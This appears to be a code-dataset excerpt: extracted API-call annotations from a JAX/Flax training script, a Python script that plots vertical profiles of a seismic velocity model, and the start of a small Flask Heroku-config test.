logging\n'), ((18898, 19004), 'latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record', 'input_pipeline.create_dataset_from_tf_record', (['FLAGS.dataset_filepattern', 'token_id_table', 'char_id_table'], {}), '(FLAGS.dataset_filepattern,\n token_id_table, char_id_table)\n', (18942, 19004), False, 'from latent_programmer.decomposition_transformer_attention import input_pipeline\n'), ((20156, 20330), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig', 'models.DecomposeAttentionTransformerConfig', ([], {'base_config': 'base_config', 'attention_mask_type': 'FLAGS.attention_mask_type', 'bos_special_attention': 'FLAGS.bos_special_attention'}), '(base_config=base_config,\n attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=\n FLAGS.bos_special_attention)\n', (20198, 20330), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((20897, 20927), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (20915, 20927), False, 'import jax\n'), ((20993, 21014), 'jax.random.split', 'jax.random.split', (['rng'], {}), '(rng)\n', (21009, 21014), False, 'import jax\n'), ((21022, 21071), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['eval_config'], {}), '(eval_config)\n', (21058, 21071), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((21301, 21393), 'flax.optim.Adam', 'optim.Adam', (['FLAGS.lr'], {'beta1': '(0.9)', 'beta2': '(0.98)', 'eps': '(1e-09)', 'weight_decay': 'FLAGS.weight_decay'}), '(FLAGS.lr, beta1=0.9, beta2=0.98, eps=1e-09, weight_decay=FLAGS.\n weight_decay)\n', (21311, 21393), False, 'from flax import optim\n'), ((22201, 22231), 'flax.jax_utils.replicate', 'jax_utils.replicate', (['optimizer'], {}), '(optimizer)\n', (22220, 22231), False, 'from flax import jax_utils\n'), ((23679, 23690), 'time.time', 'time.time', ([], {}), '()\n', (23688, 23690), False, 'import time\n'), ((30635, 30648), 'absl.app.run', 'app.run', (['main'], {}), '(main)\n', (30642, 30648), False, 'from absl import app\n'), ((6479, 6514), 'jax.numpy.asarray', 'jnp.asarray', (['ret'], {'dtype': 'jnp.float32'}), '(ret, dtype=jnp.float32)\n', (6490, 6514), True, 'import jax.numpy as jnp\n'), ((7274, 7300), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\n', (7285, 7300), True, 'import jax.numpy as jnp\n'), ((8008, 8035), 'jax.numpy.argmax', 'jnp.argmax', (['logits'], {'axis': '(-1)'}), '(logits, axis=-1)\n', (8018, 8035), True, 'import jax.numpy as jnp\n'), ((8078, 8104), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\n', (8089, 8104), True, 'import jax.numpy as jnp\n'), ((10914, 10935), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['(0)'], {}), '(0)\n', (10932, 10935), False, 'import jax\n'), ((10943, 10972), 'jax.numpy.ones', 'jnp.ones', (['inputs.shape', 'dtype'], {}), '(inputs.shape, dtype)\n', (10951, 10972), True, 'import jax.numpy as jnp\n'), ((10980, 11010), 'jax.numpy.ones', 'jnp.ones', (['outputs.shape', 'dtype'], {}), '(outputs.shape, dtype)\n', (10988, 11010), True, 'import jax.numpy as jnp\n'), ((11018, 11047), 'jax.numpy.ones', 'jnp.ones', (['target_shape', 'dtype'], {}), '(target_shape, dtype)\n', (11026, 11047), True, 'import jax.numpy as jnp\n'), ((14867, 14899), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x[0])', 'xs'], {}), '(lambda x: x[0], xs)\n', (14879, 14899), False, 'import jax\n'), ((16797, 16810), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (16808, 16810), False, 'import jax\n'), ((20960, 20973), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (20971, 20973), False, 'import jax\n'), ((21094, 21109), 'jax.jit', 'jax.jit', (['m.init'], {}), '(m.init)\n', (21101, 21109), False, 'import jax\n'), ((21166, 21197), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\n', (21174, 21197), True, 'import jax.numpy as jnp\n'), ((21205, 21236), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\n', (21213, 21236), True, 'import jax.numpy as jnp\n'), ((21244, 21280), 'jax.numpy.ones', 'jnp.ones', (['program_shape', 'jnp.float32'], {}), '(program_shape, jnp.float32)\n', (21252, 21280), True, 'import jax.numpy as jnp\n'), ((21867, 21931), 'absl.logging.info', 'logging.info', (['"""Found model checkpointed at step %d."""', 'start_step'], {}), "('Found model checkpointed at step %d.', start_step)\n", (21879, 21931), False, 'from absl import logging\n'), ((22670, 22760), 'functools.partial', 'functools.partial', (['train_step'], {'learning_rate_fn': 'learning_rate_fn', 'config': 'train_config'}), '(train_step, learning_rate_fn=learning_rate_fn, config=\n train_config)\n', (22687, 22760), False, 'import functools\n'), ((22845, 22914), 'functools.partial', 'functools.partial', (['eval_step'], {'eos_token': 'eos_token', 'config': 'eval_config'}), '(eval_step, eos_token=eos_token, config=eval_config)\n', (22862, 22914), False, 'import functools\n'), ((23022, 23125), 'functools.partial', 'functools.partial', (['initialize_cache'], {'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config'}), '(initialize_cache, max_decode_len=FLAGS.max_program_length,\n config=predict_config)\n', (23039, 23125), False, 'import functools\n'), ((23211, 23363), 'functools.partial', 'functools.partial', (['predict_step'], {'eos_token': 'eos_token', 'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config', 'slow_decode': 'FLAGS.slow_decode'}), '(predict_step, eos_token=eos_token, max_decode_len=FLAGS.\n max_program_length, config=predict_config, slow_decode=FLAGS.slow_decode)\n', (23228, 23363), False, 'import functools\n'), ((23614, 23638), 'jax.local_device_count', 'jax.local_device_count', ([], {}), '()\n', (23636, 23638), False, 'import jax\n'), ((9202, 9231), 'jax.numpy.where', 'jnp.where', (['(programs > 0)', '(1)', '(0)'], {}), '(programs > 0, 1, 0)\n', (9211, 9231), True, 'import jax.numpy as jnp\n'), ((10440, 10484), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (10476, 10484), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((10857, 10901), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (10893, 10901), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((11936, 11964), 'jax.numpy.where', 'jnp.where', (['(outputs > 0)', '(1)', '(0)'], {}), '(outputs > 0, 1, 0)\n', (11945, 11964), True, 'import jax.numpy as jnp\n'), ((14151, 14176), 'numpy.tile', 'np.tile', (['x[-1]', 'tile_dims'], {}), '(x[-1], tile_dims)\n', (14158, 14176), True, 'import numpy as np\n'), ((14696, 14716), 'jax.lax.psum', 'jax.lax.psum', (['x', '"""i"""'], {}), "(x, 'i')\n", (14708, 14716), False, 'import jax\n'), ((16873, 16919), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '"""tb"""', 'hparam_str'], {}), "(FLAGS.save_dir, 'tb', hparam_str)\n", (16885, 16919), False, 'import os\n'), ((19322, 19346), 'numpy.ceil', 'np.ceil', (['(batch_size / 10)'], {}), '(batch_size / 10)\n', (19329, 19346), True, 'import numpy as np\n'), ((21730, 21785), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '"""checkpoints"""', 'hparam_str'], {}), "(FLAGS.save_dir, 'checkpoints', hparam_str)\n", (21742, 21785), False, 'import os\n'), ((21976, 22092), 'absl.logging.info', 'logging.info', (['"""Checking that start_step (%s) == finetune_start_step (%s)"""', 'start_step', 'FLAGS.finetune_start_step'], {}), "('Checking that start_step (%s) == finetune_start_step (%s)',\n start_step, FLAGS.finetune_start_step)\n", (21988, 22092), False, 'from absl import logging\n'), ((24500, 24543), 'absl.logging.info', 'logging.info', (['"""Gathering training metrics."""'], {}), "('Gathering training metrics.')\n", (24512, 24543), False, 'from absl import logging\n'), ((24564, 24601), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['metrics_all'], {}), '(metrics_all)\n', (24588, 24601), False, 'from flax.training import common_utils\n'), ((24674, 24708), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 'metrics_all'], {}), '(jnp.sum, metrics_all)\n', (24686, 24708), False, 'import jax\n'), ((24777, 24830), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / denominator)', 'metrics_sums'], {}), '(lambda x: x / denominator, metrics_sums)\n', (24789, 24830), False, 'import jax\n'), ((25673, 25718), 'absl.logging.info', 'logging.info', (['"""Gathering evaluation metrics."""'], {}), "('Gathering evaluation metrics.')\n", (25685, 25718), False, 'from absl import logging\n'), ((25746, 25757), 'time.time', 'time.time', ([], {}), '()\n', (25755, 25757), False, 'import time\n'), ((26031, 26069), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['eval_metrics'], {}), '(eval_metrics)\n', (26055, 26069), False, 'from flax.training import common_utils\n'), ((26096, 26131), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 'eval_metrics'], {}), '(jnp.sum, eval_metrics)\n', (26108, 26131), False, 'import jax\n'), ((26215, 26278), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / eval_denominator)', 'eval_metrics_sums'], {}), '(lambda x: x / eval_denominator, eval_metrics_sums)\n', (26227, 26278), False, 'import jax\n'), ((26753, 26799), 'absl.logging.info', 'logging.info', (['"""Gathering beam search metrics."""'], {}), "('Gathering beam search metrics.')\n", (26765, 26799), False, 'from absl import logging\n'), ((7209, 7231), 'flax.linen.log_softmax', 'nn.log_softmax', (['logits'], {}), '(logits)\n', (7223, 7231), True, 'from flax import linen as nn\n'), ((9332, 9376), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (9368, 9376), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((11711, 11755), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (11747, 11755), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((14794, 14829), 'jax.numpy.broadcast_to', 'jnp.broadcast_to', (['x', '((1,) + x.shape)'], {}), '(x, (1,) + x.shape)\n', (14810, 14829), True, 'import jax.numpy as jnp\n'), ((16452, 16483), 'json.loads', 'json.loads', (['FLAGS.xm_parameters'], {}), '(FLAGS.xm_parameters)\n', (16462, 16483), False, 'import json\n'), ((24132, 24145), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (24143, 24145), False, 'import jax\n'), ((25038, 25062), 'jax.numpy.exp', 'jnp.exp', (["summary['loss']"], {}), "(summary['loss'])\n", (25045, 25062), True, 'import jax.numpy as jnp\n'), ((25087, 25100), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (25098, 25100), False, 'import jax\n'), ((25115, 25183), 'absl.logging.info', 'logging.info', (['"""Train in step: %d, loss: %.4f"""', 'step', "summary['loss']"], {}), "('Train in step: %d, loss: %.4f', step, summary['loss'])\n", (25127, 25183), False, 'from absl import logging\n'), ((25199, 25210), 'time.time', 'time.time', ([], {}), '()\n', (25208, 25210), False, 'import time\n'), ((25868, 25895), 'flax.training.common_utils.shard', 'common_utils.shard', (['batches'], {}), '(batches)\n', (25886, 25895), False, 'from flax.training import common_utils\n'), ((26348, 26361), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (26359, 26361), False, 'import jax\n'), ((26871, 26882), 'time.time', 'time.time', ([], {}), '()\n', (26880, 26882), False, 'import time\n'), ((5777, 5814), 'jax.numpy.minimum', 'jnp.minimum', (['(1.0)', '(step / warmup_steps)'], {}), '(1.0, step / warmup_steps)\n', (5788, 5814), True, 'import jax.numpy as jnp\n'), ((10276, 10361), 'jax.numpy.logical_and', 'jnp.logical_and', (['(programs != config.base_config.bos_token)', '(programs != eos_token)'], {}), '(programs != config.base_config.bos_token, programs != eos_token\n )\n', (10291, 10361), True, 'import jax.numpy as jnp\n'), ((12255, 12306), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\n', (12291, 12306), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((12693, 12744), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\n', (12729, 12744), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((24254, 24309), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '"""checkpoints"""', 'hparam_str'], {}), "(FLAGS.save_dir, 'checkpoints', hparam_str)\n", (24266, 24309), False, 'import os\n'), ((24323, 24355), 'flax.jax_utils.unreplicate', 'jax_utils.unreplicate', (['optimizer'], {}), '(optimizer)\n', (24344, 24355), False, 'from flax import jax_utils\n'), ((27557, 27587), 'flax.training.common_utils.shard', 'common_utils.shard', (['pred_batch'], {}), '(pred_batch)\n', (27575, 27587), False, 'from flax.training import common_utils\n'), ((29522, 29574), 'jax.tree_map', 'jax.tree_map', (['np.array', '(pred_acc, pred_denominator)'], {}), '(np.array, (pred_acc, pred_denominator))\n', (29534, 29574), False, 'import jax\n'), ((29972, 29985), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (29983, 29985), False, 'import jax\n'), ((26458, 26469), 'time.time', 'time.time', ([], {}), '()\n', (26467, 26469), False, 'import time\n'), ((28579, 28611), 'absl.logging.info', 'logging.info', (['"""ios: %s"""', 'ios[-1]'], {}), "('ios: %s', ios[-1])\n", (28591, 28611), False, 'from absl import logging\n'), ((28624, 28663), 'absl.logging.info', 'logging.info', (['"""target: %s"""', 'targets[-1]'], {}), "('target: %s', targets[-1])\n", (28636, 28663), False, 'from absl import logging\n'), ((5873, 5910), 'jax.numpy.maximum', 'jnp.maximum', (['(1.0)', '(step - warmup_steps)'], {}), '(1.0, step - warmup_steps)\n', (5884, 5910), True, 'import jax.numpy as jnp\n'), ((5972, 5994), 'jax.numpy.sqrt', 'jnp.sqrt', (['warmup_steps'], {}), '(warmup_steps)\n', (5980, 5994), True, 'import jax.numpy as jnp\n'), ((18178, 18209), 'numpy.argmax', 'np.argmax', (['(program == eos_token)'], {}), '(program == eos_token)\n', (18187, 18209), True, 'import numpy as np\n'), ((30196, 30207), 'time.time', 'time.time', ([], {}), '()\n', (30205, 30207), False, 'import time\n'), ((6019, 6050), 'jax.numpy.maximum', 'jnp.maximum', (['step', 'warmup_steps'], {}), '(step, warmup_steps)\n', (6030, 6050), True, 'import jax.numpy as jnp\n'), ((27309, 27349), 'numpy.ceil', 'np.ceil', (['(cur_pred_batch_size / n_devices)'], {}), '(cur_pred_batch_size / n_devices)\n', (27316, 27349), True, 'import numpy as np\n'), ((6365, 6399), 'jax.numpy.cos', 'jnp.cos', (['(jnp.pi * (progress % 1.0))'], {}), '(jnp.pi * (progress % 1.0))\n', (6372, 6399), True, 'import jax.numpy as jnp\n')] |
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import click
import numba
def prepare_data(data_pd, parameter):
lon_set = set(data_pd["lon"])
lat_set = set(data_pd["lat"])
dep_set = set(data_pd["dep"])
lon_list = sorted(lon_set)
lat_list = sorted(lat_set)
dep_list = sorted(dep_set)
lon_mesh, lat_mesh, dep_mesh = np.meshgrid(
lon_list, lat_list, dep_list, indexing="ij")
dx, dy, dz = np.shape(lon_mesh)
value_mesh = np.zeros_like(lon_mesh)
x_mesh = np.zeros_like(lon_mesh)
y_mesh = np.zeros_like(lon_mesh)
z_mesh = np.zeros_like(lon_mesh)
r_mesh = np.zeros_like(lon_mesh)
for i in range(dx):
for j in range(dy):
for k in range(dz):
x_mesh[i, j, k], y_mesh[i, j, k], z_mesh[i, j, k], r_mesh[i, j, k] = lld2xyzr(
lat_mesh[i, j, k], lon_mesh[i, j, k], dep_mesh[i, j, k])
for index, row in data_pd.iterrows():
i = int(round((row.lon-lon_list[0])/(lon_list[1]-lon_list[0]), 0))
j = int(round((row.lat-lat_list[0])/(lat_list[1]-lat_list[0]), 0))
k = int(round((row.dep-dep_list[0])/(dep_list[1]-dep_list[0]), 0))
value_mesh[i, j, k] = row[parameter]
return x_mesh, y_mesh, z_mesh, value_mesh
def get_value(data_pd, lat, lon, dep, parameter):
return data_pd.loc[(data_pd.lat == lat) & (data_pd.lon == lon) & (data_pd.dep == dep)][parameter].values[0]
@numba.njit()
def lld2xyzr(lat, lon, dep):
R_EARTH_KM = 6371.0
r = (R_EARTH_KM-dep)/R_EARTH_KM
theta = 90-lat
phi = lon
z = r*cosd(theta)
h = r*sind(theta)
x = h*cosd(phi)
y = h*sind(phi)
return (x, y, z, r)
@numba.njit()
def cosd(x):
return np.cos(np.deg2rad(x))
@numba.njit()
def sind(x):
return np.sin(np.deg2rad(x))
# def get_value_func(x_mesh, y_mesh, z_mesh, value_mesh):
# value_func = RegularGridInterpolator(
# (x_mesh, y_mesh, z_mesh), value_mesh, method="nearest")
# return value_func
@numba.njit()
def interp_value(lat, lon, dep, x_mesh, y_mesh, z_mesh, value_mesh):
x, y, z, _ = lld2xyzr(lat, lon, dep)
distance2 = (x_mesh-x)**2+(y_mesh-y)**2+(z_mesh-z)**2
mindistance2 = np.min(distance2)
coors = np.where(distance2 == mindistance2)
value = value_mesh[coors[0][0], coors[1][0], coors[2][0]]
return value
def generate_vertical_profile_grids(lon_list, lat_list, dep_list, hnpts, vnpts):
lons = np.linspace(lon_list[0], lon_list[1], hnpts)
lats = np.linspace(lat_list[0], lat_list[1], hnpts)
deps = np.linspace(dep_list[0], dep_list[1], vnpts)
return lons, lats, deps
@click.command()
@click.option('--lon1', required=True, type=float, help="lon1")
@click.option('--lon2', required=True, type=float, help="lon2")
@click.option('--lat1', required=True, type=float, help="lat1")
@click.option('--lat2', required=True, type=float, help="lat2")
@click.option('--dep1', required=True, type=float, help="dep1")
@click.option('--dep2', required=True, type=float, help="dep2")
@click.option('--data', required=True, type=str, help="the pickle file")
@click.option('--parameter', required=True, type=str, help="physicial parameter to plot")
@click.option('--hnpts', required=True, type=int, help="horizontal npts")
@click.option('--vnpts', required=True, type=int, help="vertical npts")
def main(lon1, lon2, lat1, lat2, dep1, dep2, data, parameter, hnpts, vnpts):
lon_list = [lon1, lon2]
lat_list = [lat1, lat2]
dep_list = [dep1, dep2]
data_pd_raw = pd.read_pickle(data)
# data_pd is too big
minlon = min(lon1, lon2)
maxlon = max(lon1, lon2)
minlat = min(lat1, lat2)
maxlat = max(lat1, lat2)
mindep = min(dep1, dep2)
maxdep = max(dep1, dep2)
data_pd = data_pd_raw.loc[(data_pd_raw.lat <= maxlat) & (
data_pd_raw.lat >= minlat) & (data_pd_raw.lon < maxlon) & (data_pd_raw.lon > minlon) & (data_pd_raw.dep >= mindep) & (data_pd_raw.dep <= maxdep)]
x_mesh, y_mesh, z_mesh, value_mesh = prepare_data(data_pd, parameter)
lons_plot, lats_plot, deps_plot = generate_vertical_profile_grids(
lon_list, lat_list, dep_list, hnpts, vnpts)
values = np.zeros((hnpts, vnpts))
for ih in range(hnpts):
for iv in range(vnpts):
values[ih, iv] = interp_value(
lats_plot[ih], lons_plot[ih], deps_plot[iv], x_mesh, y_mesh, z_mesh, value_mesh)
# print(lats_plot[ih], lons_plot[ih], deps_plot[iv], values[ih, iv])
# plotting part
plt.figure()
mesh_plot_lat, mesh_plot_dep = np.meshgrid(
lats_plot, deps_plot, indexing="ij")
# get vmin and vmax
vmin_round = round(np.min(values), 2)
if(vmin_round < np.min(values)):
vmin = vmin_round
else:
vmin = vmin_round-0.01
vmax_round = round(np.max(values), 2)
if(vmax_round > np.max(values)):
vmax = vmax_round
else:
vmax = vmax_round+0.01
print(vmin, vmax, np.max(values), np.min(values), vmin_round, vmax_round)
plt.contourf(mesh_plot_lat, mesh_plot_dep,
values, 101, cmap=plt.cm.seismic_r)
v = np.arange(vmin, vmax, 0.01)
plt.colorbar(ticks=v, label="perturbation")
plt.gca().invert_yaxis()
plt.xlabel(
f"latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)")
plt.ylabel("depth(km)")
plt.show()
if __name__ == "__main__":
main()
| [
"matplotlib.pyplot.ylabel",
"numpy.arange",
"pandas.read_pickle",
"matplotlib.pyplot.contourf",
"click.option",
"numpy.where",
"matplotlib.pyplot.xlabel",
"numpy.max",
"numpy.linspace",
"numpy.min",
"numpy.meshgrid",
"click.command",
"matplotlib.pyplot.gca",
"numba.njit",
"numpy.deg2rad",
"numpy.shape",
"matplotlib.pyplot.show",
"matplotlib.pyplot.colorbar",
"numpy.zeros",
"matplotlib.pyplot.figure",
"numpy.zeros_like"
] | [((1443, 1455), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1453, 1455), False, 'import numba\n'), ((1691, 1703), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1701, 1703), False, 'import numba\n'), ((1753, 1765), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1763, 1765), False, 'import numba\n'), ((2009, 2021), 'numba.njit', 'numba.njit', ([], {}), '()\n', (2019, 2021), False, 'import numba\n'), ((2636, 2651), 'click.command', 'click.command', ([], {}), '()\n', (2649, 2651), False, 'import click\n'), ((2653, 2715), 'click.option', 'click.option', (['"""--lon1"""'], {'required': '(True)', 'type': 'float', 'help': '"""lon1"""'}), "('--lon1', required=True, type=float, help='lon1')\n", (2665, 2715), False, 'import click\n'), ((2717, 2779), 'click.option', 'click.option', (['"""--lon2"""'], {'required': '(True)', 'type': 'float', 'help': '"""lon2"""'}), "('--lon2', required=True, type=float, help='lon2')\n", (2729, 2779), False, 'import click\n'), ((2781, 2843), 'click.option', 'click.option', (['"""--lat1"""'], {'required': '(True)', 'type': 'float', 'help': '"""lat1"""'}), "('--lat1', required=True, type=float, help='lat1')\n", (2793, 2843), False, 'import click\n'), ((2845, 2907), 'click.option', 'click.option', (['"""--lat2"""'], {'required': '(True)', 'type': 'float', 'help': '"""lat2"""'}), "('--lat2', required=True, type=float, help='lat2')\n", (2857, 2907), False, 'import click\n'), ((2909, 2971), 'click.option', 'click.option', (['"""--dep1"""'], {'required': '(True)', 'type': 'float', 'help': '"""dep1"""'}), "('--dep1', required=True, type=float, help='dep1')\n", (2921, 2971), False, 'import click\n'), ((2973, 3035), 'click.option', 'click.option', (['"""--dep2"""'], {'required': '(True)', 'type': 'float', 'help': '"""dep2"""'}), "('--dep2', required=True, type=float, help='dep2')\n", (2985, 3035), False, 'import click\n'), ((3037, 3108), 'click.option', 'click.option', (['"""--data"""'], {'required': '(True)', 'type': 'str', 'help': '"""the pickle file"""'}), "('--data', required=True, type=str, help='the pickle file')\n", (3049, 3108), False, 'import click\n'), ((3110, 3203), 'click.option', 'click.option', (['"""--parameter"""'], {'required': '(True)', 'type': 'str', 'help': '"""physicial parameter to plot"""'}), "('--parameter', required=True, type=str, help=\n 'physicial parameter to plot')\n", (3122, 3203), False, 'import click\n'), ((3200, 3272), 'click.option', 'click.option', (['"""--hnpts"""'], {'required': '(True)', 'type': 'int', 'help': '"""horizontal npts"""'}), "('--hnpts', required=True, type=int, help='horizontal npts')\n", (3212, 3272), False, 'import click\n'), ((3274, 3344), 'click.option', 'click.option', (['"""--vnpts"""'], {'required': '(True)', 'type': 'int', 'help': '"""vertical npts"""'}), "('--vnpts', required=True, type=int, help='vertical npts')\n", (3286, 3344), False, 'import click\n'), ((369, 425), 'numpy.meshgrid', 'np.meshgrid', (['lon_list', 'lat_list', 'dep_list'], {'indexing': '"""ij"""'}), "(lon_list, lat_list, dep_list, indexing='ij')\n", (380, 425), True, 'import numpy as np\n'), ((452, 470), 'numpy.shape', 'np.shape', (['lon_mesh'], {}), '(lon_mesh)\n', (460, 470), True, 'import numpy as np\n'), ((488, 511), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (501, 511), True, 'import numpy as np\n'), ((525, 548), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (538, 548), True, 'import numpy as np\n'), ((562, 585), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (575, 585), True, 'import numpy as np\n'), ((599, 622), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (612, 622), True, 'import numpy as np\n'), ((636, 659), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (649, 659), True, 'import numpy as np\n'), ((2209, 2226), 'numpy.min', 'np.min', (['distance2'], {}), '(distance2)\n', (2215, 2226), True, 'import numpy as np\n'), ((2239, 2274), 'numpy.where', 'np.where', (['(distance2 == mindistance2)'], {}), '(distance2 == mindistance2)\n', (2247, 2274), True, 'import numpy as np\n'), ((2448, 2492), 'numpy.linspace', 'np.linspace', (['lon_list[0]', 'lon_list[1]', 'hnpts'], {}), '(lon_list[0], lon_list[1], hnpts)\n', (2459, 2492), True, 'import numpy as np\n'), ((2504, 2548), 'numpy.linspace', 'np.linspace', (['lat_list[0]', 'lat_list[1]', 'hnpts'], {}), '(lat_list[0], lat_list[1], hnpts)\n', (2515, 2548), True, 'import numpy as np\n'), ((2560, 2604), 'numpy.linspace', 'np.linspace', (['dep_list[0]', 'dep_list[1]', 'vnpts'], {}), '(dep_list[0], dep_list[1], vnpts)\n', (2571, 2604), True, 'import numpy as np\n'), ((3524, 3544), 'pandas.read_pickle', 'pd.read_pickle', (['data'], {}), '(data)\n', (3538, 3544), True, 'import pandas as pd\n'), ((4172, 4196), 'numpy.zeros', 'np.zeros', (['(hnpts, vnpts)'], {}), '((hnpts, vnpts))\n', (4180, 4196), True, 'import numpy as np\n'), ((4503, 4515), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4513, 4515), True, 'import matplotlib.pyplot as plt\n'), ((4551, 4599), 'numpy.meshgrid', 'np.meshgrid', (['lats_plot', 'deps_plot'], {'indexing': '"""ij"""'}), "(lats_plot, deps_plot, indexing='ij')\n", (4562, 4599), True, 'import numpy as np\n'), ((5009, 5087), 'matplotlib.pyplot.contourf', 'plt.contourf', (['mesh_plot_lat', 'mesh_plot_dep', 'values', '(101)'], {'cmap': 'plt.cm.seismic_r'}), '(mesh_plot_lat, mesh_plot_dep, values, 101, cmap=plt.cm.seismic_r)\n', (5021, 5087), True, 'import matplotlib.pyplot as plt\n'), ((5114, 5141), 'numpy.arange', 'np.arange', (['vmin', 'vmax', '(0.01)'], {}), '(vmin, vmax, 0.01)\n', (5123, 5141), True, 'import numpy as np\n'), ((5146, 5189), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {'ticks': 'v', 'label': '"""perturbation"""'}), "(ticks=v, label='perturbation')\n", (5158, 5189), True, 'import matplotlib.pyplot as plt\n'), ((5223, 5329), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['f"""latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)"""'], {}), "(\n f'latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)'\n )\n", (5233, 5329), True, 'import matplotlib.pyplot as plt\n'), ((5333, 5356), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""depth(km)"""'], {}), "('depth(km)')\n", (5343, 5356), True, 'import matplotlib.pyplot as plt\n'), ((5361, 5371), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5369, 5371), True, 'import matplotlib.pyplot as plt\n'), ((1735, 1748), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\n', (1745, 1748), True, 'import numpy as np\n'), ((1797, 1810), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\n', (1807, 1810), True, 'import numpy as np\n'), ((4658, 4672), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4664, 4672), True, 'import numpy as np\n'), ((4697, 4711), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4703, 4711), True, 'import numpy as np\n'), ((4804, 4818), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4810, 4818), True, 'import numpy as np\n'), ((4843, 4857), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4849, 4857), True, 'import numpy as np\n'), ((4949, 4963), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4955, 4963), True, 'import numpy as np\n'), ((4965, 4979), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4971, 4979), True, 'import numpy as np\n'), ((5194, 5203), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (5201, 5203), True, 'import matplotlib.pyplot as plt\n')] |
from flask import Flask
from flask_appconfig import HerokuConfig
def create_sample_app():
app = Flask('testapp')
HerokuConfig(app)
return app
def test_herokupostgres(monkeypatch):
monkeypatch.setenv('HEROKU_POSTGRESQL_ORANGE_URL', 'heroku-db-uri')
app = create_sample_app()
assert app.config['SQLALCHEMY_DATABASE_URI'] == 'heroku-db-uri'
| [
"flask_appconfig.HerokuConfig",
"flask.Flask"
